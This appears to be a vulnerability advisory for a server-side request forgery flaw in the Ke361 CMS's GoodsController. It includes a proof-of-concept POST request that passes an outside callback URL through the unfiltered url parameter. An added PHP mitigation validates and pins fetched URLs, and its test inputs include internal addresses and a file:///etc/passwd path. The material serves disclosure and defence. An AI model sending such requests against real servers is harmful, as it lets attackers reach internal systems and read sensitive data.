Ke361 GoodsController.class.php SSRF vulnerability
Vulnerability Description
The URL parameter of Ke361's GoodsController.class.php has an SSRF vulnerability, through which sensitive information can be obtained.
Vulnerability Impact
Ke361
Environment setup
https://gitee.com/jcove/ke361
Vulnerability reproduction
CMS Product Page
The vulnerable file is Application/Home/Controller/GoodsController.class.php.
The URL parameter is not filtered before it is passed to the file_get_contents function, which causes the SSRF vulnerability. Construct the following request:
POST /index.php?s=/Goods/ajGetGoodsDetial
url=https://6si2gt.dnslog.cn
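One way to validate the url parameter before fetching it, as an added example that is not Ke361's code and not from the original post; the function names are hypothetical and the fetch assumes PHP's cURL extension. It allows only http/https, rejects hosts that resolve to loopback, private or reserved IPv4 addresses, disables redirects, and pins the checked address so the request cannot re-resolve to a different one:

```php
<?php
// Added example, not Ke361 code; function names are hypothetical.
// Return a public IPv4 address for the URL's host, or null to reject it.
function resolve_public_host(string $url): ?string
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return null;
    }
    // Only web schemes: rejects file://, php://, gopher:// and similar.
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // gethostbynamel() returns IPv4 only, so bracketed IPv6 literals fail here.
    $ips = filter_var($p['host'], FILTER_VALIDATE_IP) ? [$p['host']] : gethostbynamel($p['host']);
    $flags = FILTER_FLAG_IPV4 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    if (!$ips) {
        return null;
    }
    foreach ($ips as $ip) {
        // Every address must be public: no loopback, RFC 1918 or link-local.
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return null;
        }
    }
    return $ips[0];
}

// Fetch only after validation, pinning the checked address for the request.
function fetch_public_url(string $url): ?string
{
    $ip = resolve_public_host($url);
    if ($ip === null) {
        return null;
    }
    $p = parse_url($url);
    $port = $p['port'] ?? (strtolower($p['scheme']) === 'https' ? 443 : 80);
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false, // a redirect could point back inside
        CURLOPT_RESOLVE        => ["{$p['host']}:{$port}:{$ip}"], // pin checked IP
        CURLOPT_TIMEOUT        => 5,
    ]);
    $body = curl_exec($ch);
    return $body === false ? null : $body;
}

foreach (['http://127.0.0.1/', 'http://10.0.0.5:8080/', 'file:///etc/passwd'] as $u) {
    var_dump(resolve_public_host($u)); // constructed inputs, no network needed
}
```

Where the feature only ever needs to reach a known set of sites, an allowlist of expected hosts is the stricter control.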
This post is licensed under CC BY 4.0 by the author.